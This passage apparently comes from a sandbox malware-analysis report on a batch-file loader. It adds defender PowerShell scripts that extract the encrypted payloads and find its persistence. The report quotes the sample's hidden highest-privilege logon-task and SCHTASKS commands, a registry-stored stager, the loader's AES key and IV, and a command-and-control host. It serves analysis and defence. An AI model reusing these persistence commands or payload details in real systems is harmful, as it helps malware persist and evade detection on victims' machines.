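writes the assemblies to disk instead of executing them. The key and IV default to the values in the command line above; the function names, parameter names and `payloadN.bin` output names are this example's own. Run it on an isolated analysis host, since the output files are the live second-stage payloads.

```powershell
# Added example (not from the report): offline extractor for the ':: ' batch-file
# loader seen in this sample. Mirrors the loader's AES-CBC -> GZip chain but
# writes the result to disk instead of passing it to [Reflection.Assembly]::Load.
param(
    [Parameter(Mandatory = $true)] [string] $BatPath,
    [string] $OutDir,
    # Key (AES-256) and IV hard-coded in this sample's loader; pass others for a variant.
    [string] $KeyB64 = 'F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI=',
    [string] $IvB64  = 'lnHVCKXb70Ny+fnCAwMhpw=='
)

function Unprotect-AesCbc {
    param([byte[]] $Cipher, [byte[]] $Key, [byte[]] $IV)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $dec = $aes.CreateDecryptor()
    # The leading comma keeps the byte[] intact instead of unrolling it onto the pipeline.
    try { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }
}

function Expand-GZipBytes {
    param([byte[]] $Data)
    $in  = [System.IO.MemoryStream]::new($Data)
    $out = [System.IO.MemoryStream]::new()
    $gz  = [System.IO.Compression.GZipStream]::new($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

$lines = [System.IO.File]::ReadAllLines($BatPath)
# The loader uses the first line beginning with ':: ' as the carrier: a batch
# comment that cmd.exe ignores, holding the two blobs separated by a backslash.
$carrier = $lines | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $carrier) { throw "no ':: ' carrier line found in $BatPath" }
$blobs = $carrier.Substring(3).Split('\')

$key = [Convert]::FromBase64String($KeyB64)
$iv  = [Convert]::FromBase64String($IvB64)
if (-not $OutDir) { $OutDir = Join-Path (Split-Path -Parent (Resolve-Path $BatPath)) 'extracted' }
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

for ($i = 0; $i -lt $blobs.Length; $i++) {
    $plain = Expand-GZipBytes (Unprotect-AesCbc ([Convert]::FromBase64String($blobs[$i])) $key $iv)
    $path  = Join-Path $OutDir ("payload{0}.bin" -f ($i + 1))
    [System.IO.File]::WriteAllBytes($path, $plain)
    [pscustomobject]@{
        Payload = $i + 1
        Bytes   = $plain.Length
        # A .NET assembly is a PE file: with the right key and IV the output starts with 'MZ'.
        IsPE    = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
        SHA256  = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
        Path    = $path
    }
}
```

Usage: `.\Extract-BatLoader.ps1 -BatPath '.\SteamAPI Unhooker.bat'` (the script name is arbitrary). An output that is not a PE file, or a padding exception from `TransformFinalBlock`, means the key or IV does not match the loader in that file; take both from the `$aes_var.Key` and `$aes_var.IV` assignments in its command line. The extracted assemblies can then be hashed and compared with the dropped `New.exe` and `Install.exe` listed under Files, and opened in a .NET decompiler without ever running them.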
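Persistence in this run is set up twice: `Register-ScheduledTask -TaskName 'RuntimeBroker_startup_851_str' … -AtLogon … startup_str_851.vbs … -Hidden -ExecutionTimeLimit 0 … -RunLevel Highest` re-runs the loader copy from `AppData\Roaming` at every logon, and `SCHTASKS.exe /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST` does the same for the dropped `New.exe`; the stager that the AMSI-bypass command loads sits in the registry as `HKLM\SOFTWARE` value `$77stager`. The `$77` prefix on both is the naming convention of the r77 rootkit, which hides files, registry values, tasks and processes whose names start with it from the processes it has injected; the report itself does not name r77, so treat that as context rather than a finding of this run. The triage script below is an added example, not code from the report: it flags scheduled tasks that combine the traits seen above (a prefix of interest, an action under a user-writable path, RunLevel Highest, hidden, no execution time limit, logon trigger) and lists `$77`-prefixed values under `HKLM\SOFTWARE`. The function names and the threshold of two flags are this example's own choices. It assumes the ScheduledTasks module (Windows 8 / Server 2012 and later) and a 64-bit, elevated PowerShell so that `HKLM:\SOFTWARE` is not redirected to WOW6432Node.

```powershell
# Added example (not from the report): triage the two persistence mechanisms
# seen in this sample on a suspect host.

function Find-SuspiciousLogonTask {
    param(
        [string[]] $NamePrefix   = @('$77'),                           # from this sample
        [string[]] $UserWritable = @('\AppData\', '\Temp\', '\Users\Public\')
    )
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $exec  = ('{0} {1}' -f $action.Execute, $action.Arguments).Trim()
            $flags = [System.Collections.Generic.List[string]]::new()
            foreach ($p in $NamePrefix)   { if ($task.TaskName.StartsWith($p)) { $flags.Add("name starts with $p") } }
            foreach ($u in $UserWritable) { if ($exec -like "*$u*")           { $flags.Add("runs from $u") } }
            if ("$($task.Principal.RunLevel)" -eq 'Highest')  { $flags.Add('RunLevel Highest') }
            if ($task.Settings.Hidden)                         { $flags.Add('Hidden') }
            if ($task.Settings.ExecutionTimeLimit -eq 'PT0S')  { $flags.Add('no execution time limit') }   # what -ExecutionTimeLimit 0 produces
            if ($task.Triggers | Where-Object { $_.CimClass.CimClassName -like '*LogonTrigger*' }) { $flags.Add('at logon') }
            # Any single trait is common in legitimate tasks; two or more together is worth a look.
            if ($flags.Count -ge 2) {
                [pscustomobject]@{ Task = $task.TaskPath + $task.TaskName; Action = $exec; Flags = ($flags -join ', ') }
            }
        }
    }
}

function Find-PrefixedRegistryValue {
    param([string] $KeyPath = 'HKLM:\SOFTWARE', [string] $Prefix = '$77')
    $key = Get-Item -LiteralPath $KeyPath
    foreach ($name in $key.GetValueNames()) {
        if (-not $name.StartsWith($Prefix)) { continue }
        $value = $key.GetValue($name)
        [pscustomobject]@{
            Key  = $KeyPath
            Name = $name
            Kind = $key.GetValueKind($name)
            Size = $(if ($value -is [byte[]]) { $value.Length } else { "$value".Length })
            # A .NET assembly stored as REG_BINARY, like the stager here, begins with 'MZ'.
            LooksLikePE = ($value -is [byte[]] -and $value.Length -gt 2 -and $value[0] -eq 0x4D -and $value[1] -eq 0x5A)
        }
    }
}

Find-SuspiciousLogonTask   | Format-Table -AutoSize
Find-PrefixedRegistryValue | Format-Table -AutoSize
```

Against a host in the state this report describes, the first function should surface both tasks (`RuntimeBroker_startup_851_str` with an action under `AppData\Roaming`, and `$77New.exe` with one under `AppData\Local\Temp`) and the second the `$77stager` value. An empty result from a live session is not conclusive if a `$77`-hiding rootkit is actually installed, because it filters those names out of enumeration in the processes it has injected; in that case repeat the check against the task XML under `C:\Windows\System32\Tasks` and the SOFTWARE hive read from offline media.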
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
Files
memory/2768-0-0x000000007516E000-0x000000007516F000-memory.dmp
memory/2768-1-0x00000000036B0000-0x00000000036E6000-memory.dmp
memory/2768-2-0x0000000005F30000-0x000000000655A000-memory.dmp
memory/2768-3-0x0000000075160000-0x0000000075911000-memory.dmp
memory/2768-4-0x0000000075160000-0x0000000075911000-memory.dmp
memory/2768-5-0x0000000005CF0000-0x0000000005D12000-memory.dmp
memory/2768-6-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/2768-7-0x0000000006560000-0x00000000065C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k1jzjipa.xis.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2768-16-0x00000000065D0000-0x0000000006927000-memory.dmp
memory/2768-17-0x0000000006A80000-0x0000000006A9E000-memory.dmp
memory/2768-18-0x0000000006AC0000-0x0000000006B0C000-memory.dmp
memory/2768-19-0x00000000092D0000-0x000000000994A000-memory.dmp
memory/2768-20-0x0000000007040000-0x000000000705A000-memory.dmp
memory/2768-21-0x0000000006FE0000-0x0000000006FE8000-memory.dmp
memory/2768-22-0x0000000008CF0000-0x0000000008DE2000-memory.dmp
memory/2768-23-0x000000000AF00000-0x000000000B4A6000-memory.dmp
memory/3904-25-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-26-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-35-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-36-0x0000000007840000-0x0000000007874000-memory.dmp
memory/3904-37-0x0000000071350000-0x000000007139C000-memory.dmp
memory/3904-47-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-46-0x0000000007800000-0x000000000781E000-memory.dmp
memory/3904-48-0x0000000007920000-0x00000000079C4000-memory.dmp
memory/3904-49-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-50-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-51-0x0000000007A30000-0x0000000007A3A000-memory.dmp
memory/3904-52-0x0000000007C40000-0x0000000007CD6000-memory.dmp
memory/3904-53-0x0000000007BD0000-0x0000000007BE1000-memory.dmp
memory/3904-54-0x0000000075160000-0x0000000075911000-memory.dmp
memory/3904-57-0x0000000075160000-0x0000000075911000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da41906e3c36aed8ef2af440082efe62 |
| SHA1 | 9a1dfe14214818840b9733ee63ed32f8e8a67d36 |
| SHA256 | d9eb2b01802a3809872c433dfcdc55b00f682da62366afbcfefc7d6fc469ec52 |
| SHA512 | 9453fe8441c1baff1dac83f19ecfa595ea94e1a8d718e4e23953e0855e0a54f190979d1f8c11dd9a7c12469d40aeb18b140ac34448f6b1af3b082a256c60d68c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 8ba8fc1034d449222856ea8fa2531e28 |
| SHA1 | 7570fe1788e57484c5138b6cead052fbc3366f3e |
| SHA256 | 2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2 |
| SHA512 | 7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b |
C:\Users\Admin\AppData\Roaming\startup_str_851.vbs
| MD5 | 9b1f7fd1afd17850c5f8cd9d0224cea6 |
| SHA1 | 5a60b6f7d7883e3586cad39e2e4ca0d4afe40b3e |
| SHA256 | 95c9c6c74a4dfa55c5cfead13814efb4d30025696f2ddcc87dfbeecafbc2bbd9 |
| SHA512 | d5ebe2c23eae367d2ac76ce1f4129350c19605f08fb130d6759b7757f23f47717fd05aa94dfcc1ffda7767243516cbd3f392061d4717f0d3bd1be0d2f43bdff9 |
C:\Users\Admin\AppData\Roaming\startup_str_851.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/2768-75-0x0000000075160000-0x0000000075911000-memory.dmp
memory/4580-80-0x00000000090C0000-0x000000000912C000-memory.dmp
memory/4580-81-0x00000000092E0000-0x0000000009372000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
memory/4952-97-0x0000000000060000-0x00000000000CC000-memory.dmp
memory/4580-100-0x0000000008DE0000-0x0000000008DF2000-memory.dmp
memory/1704-103-0x00000264C0B90000-0x00000264C0BB2000-memory.dmp
memory/4580-110-0x000000000B2A0000-0x000000000B2DC000-memory.dmp
memory/4580-112-0x000000000B3B0000-0x000000000B3BA000-memory.dmp
memory/1704-114-0x00000264D9390000-0x00000264D93BA000-memory.dmp
memory/1704-116-0x00007FFBA3C80000-0x00007FFBA3D3D000-memory.dmp
memory/1704-115-0x00007FFBA4280000-0x00007FFBA4489000-memory.dmp
memory/1896-124-0x00007FFBA3C80000-0x00007FFBA3D3D000-memory.dmp
memory/1896-123-0x00007FFBA4280000-0x00007FFBA4489000-memory.dmp
memory/1896-122-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1896-120-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1896-119-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1896-118-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1896-117-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1896-125-0x0000000140000000-0x0000000140008000-memory.dmp
memory/636-136-0x00007FFB64310000-0x00007FFB64320000-memory.dmp
memory/692-146-0x00007FFB64310000-0x00007FFB64320000-memory.dmp
memory/692-145-0x000001FF16300000-0x000001FF1632A000-memory.dmp
memory/1000-156-0x00007FFB64310000-0x00007FFB64320000-memory.dmp
memory/432-166-0x00007FFB64310000-0x00007FFB64320000-memory.dmp
memory/464-176-0x00007FFB64310000-0x00007FFB64320000-memory.dmp
memory/464-175-0x000001A19D1D0000-0x000001A19D1FA000-memory.dmp
memory/464-170-0x000001A19D1D0000-0x000001A19D1FA000-memory.dmp
memory/432-165-0x000001E5C2350000-0x000001E5C237A000-memory.dmp
memory/432-160-0x000001E5C2350000-0x000001E5C237A000-memory.dmp
memory/1000-155-0x00000268C5570000-0x00000268C559A000-memory.dmp
memory/1000-150-0x00000268C5570000-0x00000268C559A000-memory.dmp
memory/692-140-0x000001FF16300000-0x000001FF1632A000-memory.dmp
memory/636-135-0x000001541AF80000-0x000001541AFAA000-memory.dmp
memory/636-130-0x000001541AF80000-0x000001541AFAA000-memory.dmp
memory/636-129-0x000001541AF80000-0x000001541AFAA000-memory.dmp
memory/636-128-0x000001541AF50000-0x000001541AF75000-memory.dmp